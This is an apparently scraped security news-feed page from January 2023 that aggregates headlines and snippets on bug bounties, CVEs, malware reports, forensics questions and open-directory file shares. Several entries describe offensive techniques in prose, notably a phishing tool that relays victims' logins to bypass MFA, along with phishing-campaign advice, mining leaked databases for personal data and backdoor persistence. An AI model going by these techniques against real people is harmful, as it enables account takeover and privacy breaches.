    When I tell people what I do for a living, the usual reaction is: “Wait a minute, you mean you get paid to just Google stuff all day?!”… Continue reading on The First Digit »
    Isn’t OSINT just glorified Googling?
    When I tell people what I do for a living, the usual reaction is: “Wait a minute, you mean you get paid to just Google stuff all day?!”… Continue reading on Medium »
  • Open

    Blind XSS in Email Field; 1000$ bounty
    Where there is blind-xss, There always is xsshunter! Continue reading on Medium »
    Race Condition Vulnerabilities
    Hello OutThere Continue reading on Medium »
    Debaub Gets $40K as Bug Bounty after Identifying Flaws on Uniswap
    Continue reading on Medium »
    I Reverse engineered an Amazon Prime Error
    I encountered DECYRPTION_FAILURE while watching Amazon prime videos, I attempt to reverse engineer the cause of this error here. Continue reading on Medium »
    XSS: What I have learned
    This is a ongoing post, constantly updated with new information that I learned about XSS. Continue reading on Medium »
  • Open

    One of my servers seems to be trying to connect via RDP to an unknown server.
    I have a server lets call it 10.1.1.1 that has flagged alerts on my Untangle firewall for trying to create RDP sessions to several other servers I don't recognize on the internet. The alert reads as Session TCP 10.1.1.1:53 -> 74.125.138.100:3389. I'm confused why the server is trying to connect outbound on an RDP port over a DNS port. In the alert it says it tried to connect 116 times. Untangles support pages indicates it could be a brute force attempt, however the connection is going from inside to out so it's clearly not an attempt on my own system as far as I can tell. Any help you can give me is appreciated as I'm new to System Administration for a small company. I'll be glad to answer any specific questions I can about the situation if you have any submitted by /u/HDPaladin [link] [comments]
    Changing from Opportunistic TLS to Forced TLS
    Has anyone implemented Forced TLS for all email rather than Opportunist TLS? I'm exploring this option and was wondering how it went for others. submitted by /u/Javathemut [link] [comments]
    Would adding a DNS “A” record to CloudFlare hide my IP from Shodan?
    I have a VPS running WHM/cPanel. The domain attached to cPanel utilizes CloudFlare to conceal the server IP. On CloudFlare I have an “A” DNS record for the domain pointing to the VPS IP. Through a normal DNS, or Nameserver lookup - the VPS IP is just comes up as CloudFlare IP addresses. If I use Shodan, it reveals the WHM host name (server1.exampledomain.com) which displays the raw VPS IP. Would creating an “A” DNS record for “server1” on CloudFlare hide the actual server IP from Shodan and other host name resolving tools? I’ve added the “A” DNS record to CloudFlare for server1.exampledomain.com, but I don’t think Shodan has updated yet. So I’m not sure if it actually worked submitted by /u/GivingUp_RS [link] [comments]
    would this job listing at a multibillion dollar crypto company make you raise your eyebrows and wonder if the company posting it was recently hacked?
    Digital Currency Group (DCG), the most important and at one time one of the most valuable companies in the American cryptocurrency economy (and maybe the entire world's crypto economy), has been in a world of shit lately because of the collapse of Genesis Trading and Genesis Capital, one of the 3 jewels in its corporate crown (and also one of the only subsidiaries that actually made money - the others are Coinbase and Grayscale / GBTC) what with owing at last count somewhere between $2 to 4.5 billion to various parties including $900 million owed to retail users of Gemini, the Winklevoss's twins startup that it was refusing to pay. Here's the job posting. Also worth knowing that 69 people work at grayscale and roughly 100 at parent company DCG. --------- Here's why that job posting is on…
    BIOS Patch Debate
    Recently having some debates with sysadmins on how important it is to patch the Dell BIOS vulnerabilities listed in DSA-2022-224 and DSA-2022-144. Any advice/feedback/examples of BIOS being abused that I can use to put this to rest? submitted by /u/TheReddHaze [link] [comments]
  • Open

    Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
    submitted by /u/numanturle [link] [comments]
    Unraveling the techniques of Mac ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    GitHub Actions Privilege Escalations - The "workflow_run" trigger
    submitted by /u/dotanoam [link] [comments]
    How to avoid DoS when using Rust’s popular Hyper package
    submitted by /u/SRMish3 [link] [comments]
    SpyNote: Spyware with RAT capabilities targeting Financial Institutions
    submitted by /u/YioUio [link] [comments]
    “MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs…
    submitted by /u/SharonBlatt [link] [comments]
    pure Python implementation of MemoryModule technique to load a dll from memory without injection or shellcode
    submitted by /u/naksyn_ [link] [comments]
    Circle CI Compromised - Attackers Accessed Tokens & Other Sensitive Information
    submitted by /u/sanitybit [link] [comments]
    CarolinaCon 2023 CFP is accepting submissions here
    submitted by /u/blkmanta [link] [comments]
    Padding oracle attack: demonstration
    submitted by /u/yurichev [link] [comments]
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid [link] [comments]
    YWallet Audit Results
    submitted by /u/Gallus [link] [comments]
    Prototype Pollution in Python
    submitted by /u/Gallus [link] [comments]
  • Open

    Turla: A Galaxy of Opportunity
    submitted by /u/dmchell [link] [comments]
    Unraveling the techniques of Mac ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    pure Python implementation of MemoryModule technique to load a dll from memory without injection or shellcode
    submitted by /u/naksyn_ [link] [comments]
    Windows Credential Vault - Accessing Passwords
    submitted by /u/Clement_Tino [link] [comments]
    Join us for the Ultimate Showdown: HELK vs Covenant on Twitch!
    I'm excited to invite you to join us on our Twitch stream tonight at 9PM EET, where we'll be putting HELK stack against Covenant beacons. The focus will be to see how to detect beacons and then is it possible to evade the HELK detection. This is going to be a thrilling showdown and we can't wait to see how these two tools measure up. So, see you on https://www.twitch.tv/lsecqt submitted by /u/lsecqt [link] [comments]
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    SecWiki News 2023-01-05 Review
    2022 年 GreyNoise 在野大规模漏洞利用报告 by Avenger 调教某数字杀软,权限维持 by ourren 面向实战的基础安全体系升级 by ourren 2022年PyPI恶意包年度回顾 by ourren 2022 区块链安全及反洗钱分析年度回顾 by ourren 全方位了解CORS跨域资源共享漏洞 by 路人甲 美太空领域网络安全能力建设研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-05 Review
    2022 年 GreyNoise 在野大规模漏洞利用报告 by Avenger 调教某数字杀软,权限维持 by ourren 面向实战的基础安全体系升级 by ourren 2022年PyPI恶意包年度回顾 by ourren 2022 区块链安全及反洗钱分析年度回顾 by ourren 全方位了解CORS跨域资源共享漏洞 by 路人甲 美太空领域网络安全能力建设研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    探究Groovy组件的利用方式
    对java中的Groovy组件漏洞进行了总结
    SnakeYaml从漏洞探测到利用姿势
    学习了SnakeYaml的结合第三方库的利用姿势和自身JDK的利用
    等保测评项——弱口令空口令
    本文详细介绍了等保测评中弱口令、空口令的测评关键点以及注意事项,仅供读者参考。
    FreeBuf 2023年度活动计划公布 | 会员体系全新升级
    大家期待的FreeBuf 2023年度活动规划来了,是不是期待很久了~
    cypherhound:一个针对BloodHound数据集的终端应用程序
    cypherhound是一款功能强大的终端应用程序,该工具基于Python 3开发,包含了260+针对BloodHound数据集的Neo4j密码。
    记一次2022某地HVV中的逆向分析
    事情是这样的,国庆前期某地HVV,接到了客户通知他们收到了钓鱼邮件想要溯源。
    FreeBuf早报 | 乌克兰通过数字矩阵实现网络中心战;微软考虑在必应中加入 ChatGPT
    全球动态 1.乌克兰军队通过临时数字矩阵实现“网络中心战”乌克兰军队在俄乌战争期间通过卫星通信和定制软件临时搭建了连接无人机、战士和武器的网络,为该国军队提供了一定程度的情报、协调和准确性,从而能够与俄罗斯庞大但行动迟缓的军队周旋。【阅读原文】2.Facebook因强迫用户接受定向广告而被爱尔兰监管机构罚款 4.14 亿美元爱尔兰数据保护委员会 (DPC) 已对 Meta Platforms处以3
    结合CC链注入无文件Tomcat内存马
    结合CC链注入无文件Tomcat内存马分享学习!
    多方聚力共筑安全,贝壳找房主办第二届白帽峰会圆满落幕
    2022年12月27日,“贝壳安全TIME”第二届白帽峰会暨贝壳SRC三周年的生日庆典如约在线上举办。
    又吃巨额罚单!Meta因违反欧盟数据隐私规定被罚 3.9 亿欧元
    因Meta强迫用户接受定向投放的个性化广告,违反欧盟《通用数据保护条例》,爱尔兰数据保护委员会向Meta开出3.9亿欧元巨额罚单。
    奔驰、宝马等汽车品牌存在 API 漏洞,可能暴露车主个人信息
    API 漏洞允许黑客进行远程解锁、启动车辆、跟踪汽车行踪,窃取车主个人信息的恶意攻击活动。
    2亿Twitter用户的数据被公开,仅需2美元即可下载
    一个流行的黑客论坛上发布了包含 2亿Twitter用户数据的文件。
    密码的安全管理;OA登录锁定策略及特权账号管理方案| FB甲方群话题讨论
    密码如何安全管理?OA登录锁定策略如何定义?特权账号安全管理探讨。
  • Open

    Recipes
    https://www.cyber-kitchen.com/archive/ submitted by /u/Waste-Release-6235 [link] [comments]
    Category Download from Archive
    submitted by /u/manymarco [link] [comments]
    No-Intro romsets
    https://myrient.erista.me/files/No-Intro/ submitted by /u/Waste-Release-6235 [link] [comments]
    Is there a way to add filenames from a txt document
    I have a txt file which has file names and links which looks like this: https://imgur.com/a/o7IQnn5 I am able to download these links with wget but the filenames are very weird. Is there a way to download these links with the filenames above? If not, then maybe I can rename these files after downloading? I am not sure how to do this because there are about 100 videos here and it would take hours if I download and rename each link manually. submitted by /u/Idontknowwhattouse01 [link] [comments]
  • Open

    PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources
    We take a deep dive into Automated Libra, the cloud threat actor group behind the freejacking campaign PurpleUrchin. The post PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources appeared first on Unit 42.
  • Open

    ChatGPT: be my fuzz text expert
    I told ChatGPT to be my fuzzing assistant using the feedback based fuzzing tool CI Fuzz. Here is what it did. Continue reading on Medium »
  • Open

    ChatGPT: be my fuzz text expert
    I told ChatGPT to be my fuzzing assistant using the feedback based fuzzing tool CI Fuzz. Here is what it did. Continue reading on Medium »
  • Open

    Magnet Forensics Certification Tests - Anyone?
    Has anyone taken any of the Magnet Forensics Axiom Cyber certification tests? I’ve taken the AX200 class, but have not yet tackled the test. Not sure how the format is, can you use books, etc. If you’ve taken one, what do they compare to (SANS?). Thanks. submitted by /u/forensicfun327 [link] [comments]
  • Open

    CVE-2022-40127: RCE in Apache Airflow <2.4.0 bash example
    Internet Bug Bounty disclosed a bug submitted by leixiao: https://hackerone.com/reports/1776476 - Bounty: $4000

  • Open

    Escaping from bhyve
    submitted by /u/Gallus [link] [comments]
    Fun and Games with Intel AMT
    submitted by /u/lightgrains [link] [comments]
    In-depth Analysis of the PyTorch Dependency Confusion Administered Malware
    submitted by /u/gfdgfbal [link] [comments]
    a quick post about rbac-police
    TL DR;. it's awesome. Some pods can take over the entire kubernetes cluster. Don't trust helm charts. It's super easy to audit yourself. It's not my tool. https://punksecurity.co.uk/blog/rbac-police/ submitted by /u/punksecurity_simon [link] [comments]
    CyberArk Labs’ 2022 Threat Research in Review
    submitted by /u/CyberArkLabs [link] [comments]
    PBS FRONTLINE investigates Pegasus, the powerful spyware sold to governments around the world by the Israeli company NSO Group.
    submitted by /u/identifytarget [link] [comments]
  • Open

    Can you become a pen tester if you’re autistic?
    Hi. I’m autistic and have ADHD, and I would like to know if I can become a pen tester. I struggle with making phone calls, socializing, being alone, organization and planning. What can I do to overcome these hurdles? And can I be successful as a pen tester if I overcome the hurdles? submitted by /u/AlternativeNo5023 [link] [comments]
    Do you use any cloud security posture solutions?
    Have AWS and Azure which will be expanding soon, trying to get a handle on AWS at the moment to make sure instances stay patched, CrowdStrike installed, no misconfigurations like open SSH to the world. Would be nice to find something to help with this, any suggestions? submitted by /u/internetquestions21 [link] [comments]
    Which Masters? Georgia Tech vs SANS vs Utica
    Cross-posted from r/Cybersecurity as I know this subreddit is more question oriented. I've shortlisted 3 different Master's to pursue. I'd like to hear opinions on these programs from anyone who has previously attended, professors/instructors, and anyone else who has done their own research on pursuing a masters themselves. Online MS in Cybersecurity at Georgia Tech Policy Track. Pros: 10k, 2 years, high ranking university, eligible for scholarship for Service(SFS), fully funded by my work, eligible for most grants and scholarships. Cons: not an NSA Center of Academic Excellence(CAE) program (a different degree is), Policy Track is not technical, but the technical track requires extremely good programming skills. SANS Institute MS in Cyber Security Engineering. Pros: World renowne…
    Got sent a photo/video snap from a stranger that turned into a link. Is it a virus/malware?
    A stranger added me on snapchat and sent me a snap. I can't remember if it was a video or photo, but it was one of them. After I tapped on the snap no video or photo showed and it turned into a link, like a mini-url. I wasn't brought to a website or anything, but I am thinking that by tapping on the snap it infected my phone with malware? Is this possible? Am I safe? For some reason I think that you wouldn't be able to get infected this way. submitted by /u/EnterShikariZzz [link] [comments]
    EDGECAST...Is it safe?
    I am sure a lot of you have seen connections from your comp to this IP range 72.21.80.0/3 checking virus total seems to tell me its coming from microsoft. but there are a lot of conflicting opinions on wether or not this is malicious. based on the analysis the only security vendor that flags it as malicious is comodo Valkyrie verdic yet everything else checks out it. it says its a domain from edgecast and is a secure server encrypted with SHA256. is this server being abused in any way cause I have seen a handful of people complain about it yet I cant make the call yet. should I block this IP? submitted by /u/Playful-Net9746 [link] [comments]
    Burner to Home Wi-Fi
    Would connecting a burner laptop or phone to your personal home Wi-Fi while under VPN and Tails compromise the burner? submitted by /u/VizVincent [link] [comments]
    Fidelis Network feasible for ICS environments?
    Hi r/asknetsec, I am looking for experiences and professional insights on the usefulness of Fidelis Network in ICS environments. I already used the search function and just found this: https://www.reddit.com/r/AskNetsec/comments/3de2uw/fidelis The information that's publicly available on their website is as usual superficial marketing mumbo jumbo. However, I got the impression from it, that Fidelis Network is mostly targeted for use in enterprise and cloud environments. Any experiences or suggestions? submitted by /u/Goforhistory [link] [comments]
    How can you do PCI compliant 2FA for workstations that are in scope?
    How can one do 2FA for workstations that are in scope (both Windows and Mac) to be PCI compliant? So basically to require both a password upon startup plus a second factor of authentication to be able to login. I looked at a Yubikey as a solution, but it doesn't seem to be PCI compliant, the PIN is only alphanumeric. ​ Curious how other people do this? submitted by /u/apache99 [link] [comments]
  • Open

    ~20 Anime 1080p Seasons (fast seedbox)
    submitted by /u/mingaminga [link] [comments]
    A few classic movies on a seedbox. And all 5 seasons of "Rhoda" from 1978 (for some reason)
    submitted by /u/mingaminga [link] [comments]
    Full Seasons of ~20 TV Series on a fast seed box
    submitted by /u/mingaminga [link] [comments]
    How do I even into?
    This post is aimed at the newcomers to this sub. Those who’ve just discovered ODs (Open Directories). It covers most of the “How to” questions. MOST OF THIS INFORMATION IS ALREADY IN THE LINKS IN THE SIDEBAR OR IN THE STICKY AT THE TOP OF SUB’S FRONTPAGE. Please read them 1st before asking questions. None of us here are getting paid, certainly not to spoonfeed new users as they come along. How to download. There are probably as many ways to download as there are lengths of string in the sea (shitty mixed metaphor for ESL). If you go here and look at the “Softwares” section you’ll find a gud writeup of the majority of tools most of the users here use. My personal goto is: wget -rcv -np -nc “the url you want to download” If you are new to wget as well as the links in the sidebar there are a number of wizards that can take you thru the switches to use. How to search There are a few frontends to google which help if your google-dorks/fu isn’t so great Grasshopper. Again use the link I’ve already posted and look at the “search” subheadings. There are a couple of links in the sidebar that explain the process in a bit more detail. How to post Gotta be honest muh post about posting breddy much covers it. rubs lapels If there is something about posting that isn’t in there - let me know & I’ll amend it. I get that this is a pretty lazy post (all I’ve done is reposted links) but that’s the point - most of the answers to most of the how to questions are literally already there. Speaking for myself (having been here for a while): most of us are happy to help. But spoonfeeding the basics over & over & over & over again just gets tiresome. Even moreso when a few minutes of reading on the questioners part could save a lot of time & effort. Having said that: once you’ve rtfm’d I personally am always happy to answer more in-depth or technical questions. Thanks always to /u/ElectroXexual for their excellent post. submitted by /u/ringofyre [link] [comments]
  • Open

    Reducing your Online Footprint in 2023
    Introduction Continue reading on Medium »
    Fact Check & SOCMINT Investigation
    CALL FOR ASSISTANCE Continue reading on The Sleuth Sheet »
    Using Grep for Osint
    Time to dig through some juicy databases! We’ll be scouring them for all kinds of personal info like usernames, emails, IPs, and even DOBs… Continue reading on Medium »
    Using Grep for Osint
    Time to dig through some juicy databases! We’ll be scouring them for all kinds of personal info like usernames, emails, IPs, and even DOBs… Continue reading on Medium »
    Telegram began to hide chat participants… what to do?
    Telegram has added an option to hide the list of chat participants (for chats with more than 100 users). Previously, this feature was only… Continue reading on Medium »
    The Sleeper Cell Writeup
    PROLOGUE Continue reading on The Sleuth Sheet »
    CyberDefenders L’espion writeup
    This is L’espion writeup Continue reading on Medium »
  • Open

    CVE-2022-23520: Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)
    Internet Bug Bounty disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1805893 - Bounty: $2400
    CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
    Internet Bug Bounty disclosed a bug submitted by 0b5cur17y: https://hackerone.com/reports/1805899 - Bounty: $2400
    CSV Injection at https://assets-paris-demo.codefi.network/
    Consensys disclosed a bug submitted by doosec101: https://hackerone.com/reports/1748961 - Bounty: $500
  • Open

    DeFi auditor nets $40k for identifying Uniswap vulnerability
    Article URL: https://cointelegraph.com/news/defi-auditor-nets-40-000-for-identifying-uniswap-vulnerability Comments URL: https://news.ycombinator.com/item?id=34251127 Points: 3 # Comments: 0
    Critical Vulnerability in Uniswap
    Article URL: https://twitter.com/dedaub/status/1610058814094450694 Comments URL: https://news.ycombinator.com/item?id=34246128 Points: 1 # Comments: 0
  • Open

    GIAC GCFE
    Helpful tips/tricks for GCFE exam? Created an index and plan on taking practice exams. Nervous for the test submitted by /u/Starbiess17 [link] [comments]
  • Open

    Learning Web-Sec - Day 8 - Authentication Intro and Apprentice Labs
    A Basic Introduction to Authentication Vulnerabilities Continue reading on Medium »
    Bug Bounty Alert: Welcome Inverse Finance
    Today we welcome the first bug bounty of the year! Welcome home, Inverse Finance. We are thrilled to have them join us in our efforts… Continue reading on Medium »
    Moonbeam, Astar, And Acala Library Truncation Bugfix Review — $1m Payout
    Summary Continue reading on Immunefi »
    bWAPP HTML Injection — Stored
    HTML Injectionun bir türü olan “Stored” İngilizcede depolanmış, saklanmış gibi anlamlarına gelmektedir. Bu zafiyet, bir web sayfasında… Continue reading on Medium »
    Cross-site scripting in fairphone.com
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
    Bypass Premium Account Payment (GetPocket)
    Greetings Guys! 🤙 Today I bring you a Bug I found at the Beginning of the Year 2022 You know GetPocket Web Application, a popular for… Continue reading on Medium »
    P1 Bug Bounties: Subdomain Takeover Bug Hunting
    TL;DR- A guide to subdomain takeover, critical vulnerabilities associated with insecure protections, and its potential for critical bug… Continue reading on The Gray Area »
    bWAPP HTML Injection — Reflected
    HTML Injection Nedir? Continue reading on Medium »
  • Open

    SecWiki News 2023-01-04 Review
    卡巴斯基深度报告:从俄乌战争重新评估网络战 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-04 Review
    卡巴斯基深度报告:从俄乌战争重新评估网络战 by ourren 更多最新文章,请访问SecWiki
  • Open

    The tech debt you need
    There’s good tech debt and bad tech debt in embedded systems and automotive software development. Continue reading on Medium »
  • Open

    The tech debt you need
    There’s good tech debt and bad tech debt in embedded systems and automotive software development. Continue reading on Medium »
  • Open

    FreeBuf早报 | 警惕利用Flipper Zero的网络钓鱼;高通修复芯片组多个安全漏洞
    全球动态1.马来西亚政府下令调查影响1300万公民的数据泄露事件马来西亚通信和数字部长Fahmi Fadzil已下令调查涉嫌大规模数据泄露事件,据报道涉及马来亚银行,Astro和选举委员会的数据。据报道,据称的违规行为影响了1 300万公民。[外刊-阅读原文]2.Google指控印度反垄断机构复制欧盟的部分裁决2022年10月,印度反垄断机构CCI向Google开出1.61亿美元反垄断罚单。现在,
    都已经2023年了,去哪儿还在利用大数据杀熟?官方回应
    网友发视频称,去哪儿存在大数据杀熟现象,不同用户使用不同设备,在去哪儿网上的价格完全不一样。
    2022 年全球数据泄露事件 TOP 100 | FreeBuf 年度盘点
    本文按照时间线梳理出 2022 年全球重大数据泄露事件 TOP 100,希望能给企业的数据保护和安全建设带来一些帮助。
    继蔚来数据泄露后,又一老牌车企泄露200GB用户数据
    随着智能汽车的快速发展,汽车数据处理能力增强,汽车数据安全暴露的风险也日益突出。
    一种针对Microsoft Office的自动化攻击方式
    如果受害者机器安装了 Microsoft Office ,恶意软件就可以利用 COM 对象对目标主机进行恶意攻击。
  • Open

    Reinforcement learning for red team automation
    submitted by /u/limmen [link] [comments]
    Phishim: Simple phishing with Puppeteer
    https://github.com/jackmichalak/phishim I wanted to share this phishing tool I built last year which I successfully used in a red team exercise. It spins up a Puppeteer browser on the server and then forwards screenshots down to the victim's browser and forwards interactions (clicks, key presses) up to the server. Since the victim performs the login themselves on the virtual browser, most types of MFA offer no additional protection. You can then access the virtual browser to use the login session the victim created. submitted by /u/jack_michalak [link] [comments]
  • Open

    Persistence || Backdoor Techniques (Beginner to Advanced) in Linux
    Part-1 Continue reading on Medium »
  • Open

    Patch diff an old vulnerability in Synology NAS
    作者:cq674350529 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 之前在浏览群晖官方的安全公告时,翻到一个Critical级别的历史漏洞Synology-SA-18:64。根据漏洞公告,该漏洞存在于群晖的DSM(DiskStation Manager)中,允许远程的攻击者在受影响的设备上实现任意代码...
  • Open

    Patch diff an old vulnerability in Synology NAS
    作者:cq674350529 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 之前在浏览群晖官方的安全公告时,翻到一个Critical级别的历史漏洞Synology-SA-18:64。根据漏洞公告,该漏洞存在于群晖的DSM(DiskStation Manager)中,允许远程的攻击者在受影响的设备上实现任意代码...
  • Open

    Thoughts on Signal Labs vulnerability research course?
    Hi all, Long time lurker, first time poster. Does anybody have any strong thoughts on the Signal Labs vulnerability research course? I’ve got some education $$$ to burn and the course checks a lot of boxes for me: professional looking, self paced, deep dive on windows fuzzing. For reference I’m middling decent at reverse engineering and windows internals and bug hunting, and I’m looking to push forward my fuzzing & vuln research knowledge. As an aside I really appreciate the community around this sub and all the information regularly shared here. Y’all are great. Thanks jjh submitted by /u/offensivepolitics [link] [comments]

  • Open

    Filesystem Fuzzing with American Fuzzy Lop [pdf]
    Article URL: https://events.static.linuxfound.org/sites/events/files/slides/AFL%20filesystem%20fuzzing%2C%20Vault%202016_0.pdf Comments URL: https://news.ycombinator.com/item?id=34239068 Points: 2 # Comments: 0
  • Open

    A few classic pc games
    http://mc.tulli.com:25565/windows-archive/games/9x/kali-compatible/ submitted by /u/Waste-Release-6235 [link] [comments]
    how to download all the files in this link at one go.. please help guys
    submitted by /u/_G0DFATHER [link] [comments]
    sink and tap datasheets
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Hats Finance 2022 Recap
    2022 was an incredible year for Hats Finance! Despite the wild ride, we are thankful for every single person that contributed to our… Continue reading on Medium »
    Access to page with default credentials that require authenticate $$$.
    Hi guys! This is my second article about Bug Bounty Report writes up and I hope you will like it! Continue reading on Medium »
    FTP Access-with-anonymous-login-credentials-enabled.
    Hi guys! This is my first article about Bug Bounty Report writes up and I hope you will like it! I’m a bug hunter on hackerone and I… Continue reading on Medium »
    bWAPP: A Vulnerable Web Application for Practicing Vulnerabilities - Installation Guide
    How to Install bWAPP in Linux for Testing Vulnerabilities to start your Bug Bounty Hunting Continue reading on Medium »
    Vue JS Reflected XSS
    Hi guys, in this writeup I will be showing you how I was able to get a reflected XSS on a VueJS application. Continue reading on Medium »
    My hacking story: Its a Journey, not a destination
    Background Continue reading on Medium »
    Python script that will get a search term from the user and search for related articles on Medium…
    To use this script, you will need to install the requests library: Continue reading on Medium »
    simple Python script that can scan a URL for a Remote Code Execution (RCE) vulnerability.
    This script uses the requests module to send a POST request to the specified URL with a payload that contains code that can be used to… Continue reading on Medium »
    Simple python script which ask url and try to scan for file inclusion vulnerability.
    Continue reading on Medium »
    How to Get Into Bug Bounties?( Beginner’s guide)
    Hello Future Bug Bounty Hunters! Continue reading on Medium »
  • Open

    Why do ransomware hackers ask for payment in Bitcoin vs an anonymous currency like Monero?
    ransomware typically encrypts a target's files and demands payment in Bitcoin in order to decrypt them. Bitcoin however is very traceable, in that the transaction history is public on the blockchain and shows exactly which addresses are receiving which amounts, and also which was sold to be converted to cash or a stable coin. Why dont Hackers instead use a cryptocurrency who's purpose is specifically to obscure who is sending what amount to who, so as to preserve privacy and avoid being caught by the authorities? Why stick to the proven traceable currency instead? submitted by /u/JamieOvechkin [link] [comments]
    problem with nexpose console
    hi guys, i'm trying to use nexpose but i have a problem that i can't solve .... i give to the terminal " systemctl start nexposeconsole" and through the link , I access the console , which tells me to wait for the loading ... but the loading does not even start and shortly after my pc is no longer even listening on port 3780 and the browser rightly tells me "Unable to connect" ........I state that the other times I used nexpose it worked without problems .... can you help me please? submitted by /u/metal_carter [link] [comments]
    Performing a phishing campaign.
    Hello, Its my first time I'll need to perform phishing. And I'm asking for any resources, books or methodologies on how to conduct that kind of test. I've watched Graham Helton's guide, which was very informative and provided me an idea about the process and the tools like gophish and evilginx2. I'll do the OSINT and research all the employees, this won't be the hard part, but the thing I'm not aware is the part with the DNS and the Mail Server. The guy uses Mailgun to send emails what are your thoughts about that? The other part I can't understand is that in every tutorial or article I see, the testers purchase a domain which is similar to the victims domain, but my company won't do it. Is there any possible way to just reuse an existing domain and somehow manipulate it to look like theirs or what are my options? Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    "Old d0g: new tricks?" - asking the community for some guidance on suggested learning as an experienced engineer to change my life.
    Hello, I'm a recovering electrotechnical engineer (masters in telecommunications major) that has morphed into a software engineer in the midst of my career, now circa 12 years. All my life I've loved tinkering with machines and trying to understand how stuff works and of course as a kid I was attracted to solving crackmes, learning assembly thru ORC tutorials, participating in CTFs, etc.. etc... that somehow was always what I liked. Somehow at some point of my life, while working but still being engaged into doing CTF's on VulnHub, or other sources finding HTB a couple of years ago kind of rekindled the spark. I started doing a lot of boxes, paying both HTB and ThM subscriptions, trying to learn and write and I almost felt again the love I had for these topics as a kid or adolescent. Nee…
    Saving Master password on Google Drive
    I use a password manager and just wondering if it is ok to save my master password on Google drive! If not, what is the best way to securely store it? submitted by /u/SmoothStatistician8 [link] [comments]
  • Open

    How to use nmap
    Nmap (Network Mapper) is a free and open-source network scanner tool that is used to discover hosts and services on a computer network by… Continue reading on Medium »
  • Open

    WebSniffer 2023 New Year Resolutions: Upgrades, API Support, and More
    WebSniffer has released its new year resolutions for 2023, which include upgrading the web interface, upgrading to a modern web platform… Continue reading on WebSniffer »
    Lampyre Q4 2022 updates
    We haven’t been here for a while, and there’s a reason for that: we’ve… Continue reading on Medium »
  • Open

    Nuclear Pond: Scanning for Vulnerabilities at Scale for Less Than a Cup of Coffee
    submitted by /u/crustysecurity [link] [comments]
    of-CORS: a framework for hacking internal apps with open CORS via bug bounty
    submitted by /u/wifihack [link] [comments]
    SSRF vulnerabilities caused by SNI proxy misconfigurations
    submitted by /u/Gallus [link] [comments]
    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
    submitted by /u/samwcurry [link] [comments]
  • Open

    SecWiki News 2023-01-03 Review
    SecWiki周刊(第461期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-03 Review
    SecWiki周刊(第461期) by ourren 更多最新文章,请访问SecWiki
  • Open

    My 2022 APFS Advent Challenge series is complete
    submitted by /u/jtsylve [link] [comments]
    GCFA - NTFS $MFT additional study materials?
    submitted by /u/hanna-barbarian [link] [comments]
  • Open

    Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463
    submitted by /u/surrealisticpillow12 [link] [comments]
    Survey of security mitigations and architectures, December 2022
    submitted by /u/surrealisticpillow12 [link] [comments]
  • Open

    美国数据保护要求
    美国没有统一的数据安全或隐私领域的监管法律。
    【读者福利】FreeBuf编辑羊了,只能“开发”来了
    领福利啦,几万个G的学习资料还有兔 等你来~
    FreeBuf早报 | 丰田印度分公司遭遇数据入侵;火狐浏览器被误识别为IE而遭拒
    据外媒报道,丰田汽车印度分公司(Toyota Kirloskar Motor)在1月1日表示,该公司的数据泄露事件可能暴露了部分客户的个人信息。
    波兰安全机构发布警告将应对亲俄黑客全方位、多手段的网络攻击
    自俄乌冲突以来,波兰一直是亲俄黑客进行网络攻击的目标。这些攻击几乎针对波兰的任何实体,包括政府部门、私人组织、媒体机构。
    谷歌同意支付 2950 万美元,以解决两起追踪用户位置信息的诉讼案
    谷歌同意支付总计 2950 万美元。以了结两起与追踪用户位置相关的诉讼。
    LockBit竟然道歉了!并为受害者发布解密器
    LockBit宣布为袭击位于多伦多的儿童医院SickKids而道歉,并免费给受害者解密器用来解密被加密的文件。
  • Open

    Creating Darkweb Crawler using Python and Tor
    In this blog, we will look at a Python script that can be used to crawl the darkweb, and we will discuss the advantages and benefits of… Continue reading on InfoSec Write-ups »
    Golang Programming and Security Vulnerabilities
    No content preview
    Exploring the World of ESI Injection
    No content preview
  • Open

    Creating Darkweb Crawler using Python and Tor
    In this blog, we will look at a Python script that can be used to crawl the darkweb, and we will discuss the advantages and benefits of… Continue reading on InfoSec Write-ups »
    Golang Programming and Security Vulnerabilities
    No content preview
    Exploring the World of ESI Injection
    No content preview
  • Open

    Creating Darkweb Crawler using Python and Tor
    In this blog, we will look at a Python script that can be used to crawl the darkweb, and we will discuss the advantages and benefits of… Continue reading on InfoSec Write-ups »
    Golang Programming and Security Vulnerabilities
    No content preview
    Exploring the World of ESI Injection
    No content preview

  • Open

    State of the Subreddit #5
